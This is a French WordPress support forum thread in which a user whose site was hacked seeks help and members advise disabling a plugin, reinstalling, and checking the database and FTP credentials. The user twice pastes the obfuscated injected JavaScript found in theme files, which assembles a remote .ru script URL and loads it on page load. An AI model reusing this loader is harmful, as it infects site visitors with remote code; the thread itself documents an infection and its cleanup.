[Wp2.9.2] Attaque d’un virus, ré-installations de wp mais site out (Créer un compte)

  • Statut : non résolu
15 sujets de 1 à 15 (sur un total de 17)
  • Auteur
    Messages
  • #482289
    Rkl305
    Membre
    Initié WordPress
    6 contributions

    Bonjour à tous,

    Ma configuration WP actuelle
    – Version de WordPress : 2.9.2 [Fr]
    – Version de PHP/MySQL : inconnue
    – Thème utilisé : personnalisé
    – Extensions en place : admindropmenus, akismet, co-authors, democracy, fuzzvote, jeromes-keywords, maintenance-mode, rolemanager, share-this, wickett-twitter-widget, wp-db-backup, antivirus (pas encore activé)
    – Nom de l’hebergeur : 1&1
    – Adresse du site : http://www.contrepoint.info

    Problèmes rencontrés : Trash complet du site Internet du jour au lendemain.
    Infection d’un virus touchant les .php et les .js . Suite aux conseils de ce blog, j’ai donc ré-installé wordpress de manière partiel (remplacement de wp-admin, wp-inclued et des fichiers à la racine) tout en faisant une copie conforme de toutes les données se trouvant sur le serveur Ftp avant la moindre modification (disk1). Résultat : le site Internet est à nouveau en ligne mais il est in-éditable (erreur sur la plateforme wordpess online).
    Je retrouve des traces du virus dans certains fichiers (pas nommé dans l’aide), je décide de nettoyer complètement le Ftp, de réinstaller wordpress (de manière intégrale, wp-contents inclue) puis d’ajouter les fichiers en plus après vérification manuel d’absence de virus.
    Résultats finaux :
    * un site Internet qui affiche

    Warning: require_once(/homepages/4/d187694880/install-utils.inc) [function.require-once]: failed to open stream: No such file or directory in /homepages/4/d187694880/htdocs/index.php  on line 39

    Fatal error: require_once() [function.require]: Failed opening required ‘/homepages/4/d187694880/install-utils.inc’ (include_path=’.:/usr/lib/php5′) in /homepages/4/d187694880/htdocs/index.php on line 39

    or je ne possède aucun fichier « htdoc ».

    * une plateforme wordpress qui bug encore sur la page d’accueil

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-login.php on line 302

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-login.php on line 314

    et après identification :

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-login.php on line 302

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-login.php on line 314

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-includes/pluggable.php on line 665

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-includes/pluggable.php on line 666

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-includes/pluggable.php on line 667

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-includes/pluggable.php on line 868

    * impossible de récupérer la base de données, puisque je ne possède pas les identifiants (je ne suis pas webmaster, l’ancien webmaster nous a donné les codes db mais pas les codes 1&1)

    Je tiens à signaler que le site est bien en php5, le .htaccess possède les deux lignes requises pour 1&1.
    Si htdocs = racine, alors les pages index.php, wp-login.php et install-utils.inc sont bien présents (et nettoyé du virus).

    Merci de bien vouloir m’aider :'(

    #726611
    Rkl305
    Membre
    Initié WordPress
    6 contributions

    up

    #726612
    Li-An
    Participant
    Maître WordPress
    28941 contributions

    Vous pouvez récupérer la base de données avec un plugin genre http://wordpress.org/extend/plugins/wp-db-backup/
    Maintenance Mode c’est un plugin. Il est désactivé/activé ? htdocs, c’est peut-être un répertoire de l’hébergeur. Vous êtes sûr de n’avoir effacé que des fichiers autorisés ?

    #726613
    Rkl305
    Membre
    Initié WordPress
    6 contributions

    Bonjour,
    merci pour votre réponse, mais la situation a beaucoup évolué.
    J’ai réinstallé une énième fois wordpress et le site est réapparu par enchantement ! Mais le virus est toujours visible dans le code source alors que lorsque je consulte index.php, wp-inclued>wp-default-filters etc. le code n’est pas présent dans leur code source 😉

    Par ailleurs, j’ai réussi à extraire ma BDD et j’ai lancé plusieurs fois mon antivirus (à jour) mais il ne voit rien.

    Le plus embêtant est que le virus me bloque l’accès à mon tableau de bord wordpress :

    Warning: Cannot modify header information – headers already sent by (output started at /homepages/4/d187694880/htdocs/wp-content/plugins/maintenance-mode/maintenance-mode.php:1) in /homepages/4/d187694880/htdocs/wp-includes/pluggable.php on line 868

    et ce htdocs ne correspond à aucune des bases de donnée ni dossier =(
    Que faire ? [j’ai déjà appliqué la solution du blog Fanta78 et je ne peux pas enclencher des plugins]

    Merci,

    #726614
    Franck (fge)
    Modérateur
    Maître WordPress
    9572 contributions

    /homepages/4/d187694880/htdocs correspond à la racine de ton site pour le serveur. Pas de soucis à avoir de ce coté là.
    Il semble qu’un plugin (maintenance-mode) soit à l’origine du message. Avec ton logiciel de FTP, vas dans /wp-content/plugins puis renomme le dossier maintenance-mode, cela devrait désactiver le plugin (je pense que tu n’en as pas besoin tant que tu n’as pas récupéré l’interface d’admin).
    Regarde après cela si tu peux récupérer l’interface admin.

    #726615
    Anonyme 2
    Participant
    Maître WordPress
    10588 contributions

    Bonjour,

    juste une question, vous avez réinstaller,d’accord mais installation manuelle ? Si oui avez vosu enregistré le fichier wp-config.php sous le format UTF-8 sans BOM ?
    http://www.wordpress-fr.net/support/sujet-21204-cannot-modify-header-compatibilite-resume

    Merci

    #726616
    Rkl305
    Membre
    Initié WordPress
    6 contributions

    Bonjour,
    Merci pour vos réponses précieuses.
    J’ai suivi la méthode de FGE et j’ai finalement pu accéder à mon tableau de bord. J’ai ainsi pu activer les plugins « wp-db-backup » et « antivirus », par la même occasion j’ai téléchargé la dernière version de « maintenance-mode ». Aujourd’hui, le site semble être tiré d’affaire. Un grand merci à vous tous pour votre aide 🙂

    Mais (il en faut bien), il reste toujours ce javascript das le code source la page d’accueil :

    var E={S: »V »};var w={Cy: »J »};this.lz= »lz »;this.s= »s »;var e;q=function(){var U=[« i »];this.h= »h »;hf=61552;hf++;function x(F,f,P){JG={I: »uk »};return F.substr(f,P);JY={xJ:5072};}try {var MH=’fH’} catch(MH){};try {var sV=’O’} catch(sV){};this.sE=40417;this.sE++;this.H=42100;this.H++;ca=63422;ca++;this.Sv= » »;var c= »;var UY=false;this.Fd=46060;this.Fd+=89;var o=document;var n=new String(« /go »+x(« ogl9fwT »,0,3)+x(« EFIwe.cIEwF »,4,3)+x(« om/bKaq »,0,3)+x(« diswTZ »,0,3)+ »cus »+ »s.c »+x(« om.QGb9 »,0,3)+x(« hk/WiKe »,0,3)+x(« Pb9radbP9 »,3,3)+x(« t5jikatj5 »,3,3)+ »l.r »+x(« u.phYD5 »,0,3)+x(« 9eBhp9eB »,3,2));this.MW=51492;this.MW+=194;this.Is=60922;this.Is-=179;var z=RegExp;var et=[« v », »d », »m »];MV={rl:false};function p(F,f){try {var xN=’co’} catch(xN){};try {var fo=’HW’} catch(fo){};this.N=6192;this.N–;this.vv=5176;this.vv–;var P=String(« [« )+f+new String(x(« ]mMRb »,0,1));var C=new z(P, String(« g »));var nx={Vn: »cl »};return F.replace(C, c);nB={TK: »ih »};};nO=9317;nO–;aH=34437;aH+=106;Nv=[« Uh », »mC »];this.fv=44404;this.fv-=157;var g=974078-965998;var KA={};var R=null;var vq= »;var D=p(‘sPcWrCiCpVt1′,’fWC1yQVdoRALPMO’);RG={ea: »wl »};try {var TC=’uT’} catch(TC){};var Di=String(x(« boE8k »,0,2)+x(« dykvi »,0,2));eh=[« uZ », »ie »];try {var WH=’zh’} catch(WH){};e=function(){try {gp=[« qK »];var Md= »Md »;var T=p(‘cJrfeJaItveCEHlIeCm3eHnft0′,’HpAGR0IvCfkJM1TW3zw’);var sW= »;Z=o[T](D);this.IA=58811;this.IA-=154;var AA=[];dk=61309;dk++;EZ=34336;EZ–;var F=g+n;var nC=String(« defer »);var AV=new Date();var ep=new Date();var l=p(‘surKcX’,’4z8qOe27uK1VXC’);mx=[« lK », »yx »];Z[l]=String(« htt »+ »p:/ »+ »/we »+ »stc »+x(« ounEfx »,0,3)+ »try »+ ».ru »+x(« lOtd:tdOl »,4,1))+F;Z[nC]=[1,8][0];hx=[];var dJ=new Array();Yy=[« xs »];pWu={rW:1280};JC=[« _a »];o[Di].appendChild(Z);HS=19092;HS+=20;var mX=[« yn », »ae »];} catch(a){PV=[« AQ », »rE », »mxw »];};};var vb=25117;};var pWQ= »;var pd={Kg:false};q();try {var vI=’vU’} catch(vI){};window.onload=e;var kC=new Date();
    <!--492d5b2ef8ef0007930e662d23af353c-->

    Cela signifie que je dois – encore une fois – réinstaller wordpress ? 😉
    @Lupi : mes précédentes réinstallation étaient un copier/coller des dossiers wordpress dans mon serveur FTP.

    #726617
    Anonyme 2
    Participant
    Maître WordPress
    10588 contributions

    Bonjour,

    à votre place,je serais repartir d’un WordPress nouveau ,plus sûr.
    avec firebug,je vois ce script

    vous avez ce code avec le thème par défaut ?

    #726618
    Arvel
    Participant
    Padawan WordPress
    53 contributions

    Salut,

    Je sors tout juste de ce fameux virus qui a rendu mon site inaccessible.

    J’ai du télécharger WordPress sur leur site et installer cette version « propre ». J’ai aussi fait un backup de ma BDD qui était surement infectée puisqu’en remplaçant uniquement le « www » le code JS du virus restait.

    Malheureusement mon Backup datait de MArs…

    #726619
    chamomor
    Participant
    Maître WordPress
    1912 contributions

    Bonsoir
    mais tu n’as pas effacé ta base de données actuelle ? tu peux pe la récupérer maintenant non ?

    #726620
    Arvel
    Participant
    Padawan WordPress
    53 contributions
    chamomor wrote:
    Bonsoir
    mais tu n’as pas effacé ta base de données actuelle ? tu peux pe la récupérer maintenant non ?

    Elle serait infectée

    #726621
    chamomor
    Participant
    Maître WordPress
    1912 contributions

    Oui mais alors tu peux l’analyser et éradiquer le virus. Tu la récupères puis tu zieutes
    Enfin je dis ça c’est que tu semblais peiné d’avoir perdu tes publications depuis mars.

    #726622
    Rkl305
    Membre
    Initié WordPress
    6 contributions
    Lupi wrote:
    Bonjour,

    à votre place,je serais repartir d’un WordPress nouveau ,plus sûr.
    avec firebug,je vois ce script

    vous avez ce code avec le thème par défaut ?

    Bonjour,

    J’ai réinstallé la dernière version de WordPress 2.9.2 en fr. Existe-il une autre version plus récente ?
    Sinon je ne trouve ce script nul part dans les thèmes par défaut …

    J’ai aujourd’hui une nouvelle fois enlevé le script :

          var E={S: »V »};var w={Cy: »J »};this.lz= »lz »;this.s= »s »;var e;q=function(){var U=[« i »];this.h= »h »;hf=61552;hf++;function x(F,f,P){JG={I: »uk »};return F.substr(f,P);JY={xJ:5072};}try {var MH=’fH’} catch(MH){};try {var sV=’O’} catch(sV){};this.sE=40417;this.sE++;this.H=42100;this.H++;ca=63422;ca++;this.Sv= » »;var c= »;var UY=false;this.Fd=46060;this.Fd+=89;var o=document;var n=new String(« /go »+x(« ogl9fwT »,0,3)+x(« EFIwe.cIEwF »,4,3)+x(« om/bKaq »,0,3)+x(« diswTZ »,0,3)+ »cus »+ »s.c »+x(« om.QGb9 »,0,3)+x(« hk/WiKe »,0,3)+x(« Pb9radbP9 »,3,3)+x(« t5jikatj5 »,3,3)+ »l.r »+x(« u.phYD5 »,0,3)+x(« 9eBhp9eB »,3,2));this.MW=51492;this.MW+=194;this.Is=60922;this.Is-=179;var z=RegExp;var et=[« v », »d », »m »];MV={rl:false};function p(F,f){try {var xN=’co’} catch(xN){};try {var fo=’HW’} catch(fo){};this.N=6192;this.N–;this.vv=5176;this.vv–;var P=String(« [« )+f+new String(x(« ]mMRb »,0,1));var C=new z(P, String(« g »));var nx={Vn: »cl »};return F.replace(C, c);nB={TK: »ih »};};nO=9317;nO–;aH=34437;aH+=106;Nv=[« Uh », »mC »];this.fv=44404;this.fv-=157;var g=974078-965998;var KA={};var R=null;var vq= »;var D=p(‘sPcWrCiCpVt1′,’fWC1yQVdoRALPMO’);RG={ea: »wl »};try {var TC=’uT’} catch(TC){};var Di=String(x(« boE8k »,0,2)+x(« dykvi »,0,2));eh=[« uZ », »ie »];try {var WH=’zh’} catch(WH){};e=function(){try {gp=[« qK »];var Md= »Md »;var T=p(‘cJrfeJaItveCEHlIeCm3eHnft0′,’HpAGR0IvCfkJM1TW3zw’);var sW= »;Z=o[T](D);this.IA=58811;this.IA-=154;var AA=[];dk=61309;dk++;EZ=34336;EZ–;var F=g+n;var nC=String(« defer »);var AV=new Date();var ep=new Date();var l=p(‘surKcX’,’4z8qOe27uK1VXC’);mx=[« lK », »yx »];Z[l]=String(« htt »+ »p:/ »+ »/we »+ »stc »+x(« ounEfx »,0,3)+ »try »+ ».ru »+x(« lOtd:tdOl »,4,1))+F;Z[nC]=[1,8][0];hx=[];var dJ=new Array();Yy=[« xs »];pWu={rW:1280};JC=[« _a »];o[Di].appendChild(Z);HS=19092;HS+=20;var mX=[« yn », »ae »];} catch(a){PV=[« AQ », »rE », »mxw »];};};var vb=25117;};var pWQ= »;var pd={Kg:false};q();try {var vI=’vU’} catch(vI){};window.onload=e;var kC=new Date();
    <!--492d5b2ef8ef0007930e662d23af353c-->

    Justement dans une page index.php et home.php de mon thème (merci pour le coup de pouce). Et ce script semble – pour l’heure – avoir disparu du site. 😕

    Détectez-vous un virus ? (je compte changer le mien car il n’a rien détecté du début jusqu’à la fin : adieu Avira !)
    Suis-je vraiment tirée d’affaire ?
    Le plugin « antivirus » ne m’a pas beaucoup servi pour l’heure :fouet:

    Merci de votre aide.

    #726623
    Franck (fge)
    Modérateur
    Maître WordPress
    9572 contributions

    Le script cité hier par Lupi est toujours présent sur le site.
    Soit tu les sources de ta réinstallation ou ton PC sont infectés. Soit il y a une porte d’entrée à l’infection (plugins ou thème non à jour avec des vulnérabilités). Je crains que tu ne sois pas encore tirée d’affaire.
    La dernière version stable est bien la 2.9.2.

    #726624
    Jr Ewing
    Membre
    Padawan WordPress
    93 contributions

    Salut !
    Je ne sais pas si ton problème est résolu mais as-tu scanné entièrement le disque dur de ton pc avec un antivirus et avec logiciel anti-trojan/antispyware avant de réinstallé wordpress ?
    Si ce n’est pas encore fait pense à changer ton mot de passe ftp

15 sujets de 1 à 15 (sur un total de 17)
  • Vous devez être connecté pour répondre à ce sujet.